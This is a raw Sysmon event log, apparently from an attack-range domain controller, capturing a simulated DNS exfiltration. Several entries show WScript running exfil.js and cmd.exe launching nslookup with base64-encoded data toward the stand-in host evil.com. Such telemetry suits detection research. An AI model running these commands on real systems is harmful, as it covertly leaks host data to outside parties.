14:16:30.734{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.734{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.734{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.734{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5840-000000005F02}5556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.734{2E1864BB-17BE-629A-5640-000000005F02}50364232C:\Windows\system32\cmd.exe{2E1864BB-17BE-629A-5840-000000005F02}5556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.747{2E1864BB-17BE-629A-5840-000000005F02}5556C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BE-629A-5640-000000005F02}5036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmsz.tmp 2>&1 10341000x8000000000000000200157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.718{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-5740-000000005F02}5992C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.718{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-5740-000000005F02}5992C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.718{2E1864BB-17BE-629A-5740-000000005F02}59922380C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-5640-000000005F02}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.714{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5740-000000005F02}5992C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 22542200x8000000000000000200153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.473{00000000-0000-0000-0000-000000000000}6148evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.333{00000000-0000-0000-0000-000000000000}7036evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.163{00000000-0000-0000-0000-000000000000}7172evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.961{00000000-0000-0000-0000-000000000000}5744evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.838{00000000-0000-0000-0000-000000000000}5332evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000200148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.696{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000200147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.723{00000000-0000-0000-0000-000000000000}4740evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.620{00000000-0000-0000-0000-000000000000}4004evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000200145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.696{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000200144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.537{00000000-0000-0000-0000-000000000000}608evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000200143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.696{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000200142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.417{00000000-0000-0000-0000-000000000000}5908evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000200141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.696{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.696{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5640-000000005F02}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.696{2E1864BB-17A1-629A-783D-000000005F02}55527888C:\Windows\System32\WScript.exe{2E1864BB-17BE-629A-5640-000000005F02}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.707{2E1864BB-17BE-629A-5640-000000005F02}5036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmsz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.680{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrovqi.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.633{2E1864BB-17BE-629A-5440-000000005F02}29285792C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-5540-000000005F02}2600C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.618{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.618{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.618{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.618{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.618{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5540-000000005F02}2600C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.618{2E1864BB-17BE-629A-5340-000000005F02}80926932C:\Windows\system32\cmd.exe{2E1864BB-17BE-629A-5540-000000005F02}2600C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.627{2E1864BB-17BE-629A-5540-000000005F02}2600C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BE-629A-5340-000000005F02}8092C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrovqi.tmp 2>&1 10341000x8000000000000000200128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.596{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-5440-000000005F02}2928C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.596{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-5440-000000005F02}2928C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.596{2E1864BB-17BE-629A-5440-000000005F02}29285792C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-5340-000000005F02}8092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.580{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5440-000000005F02}2928C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 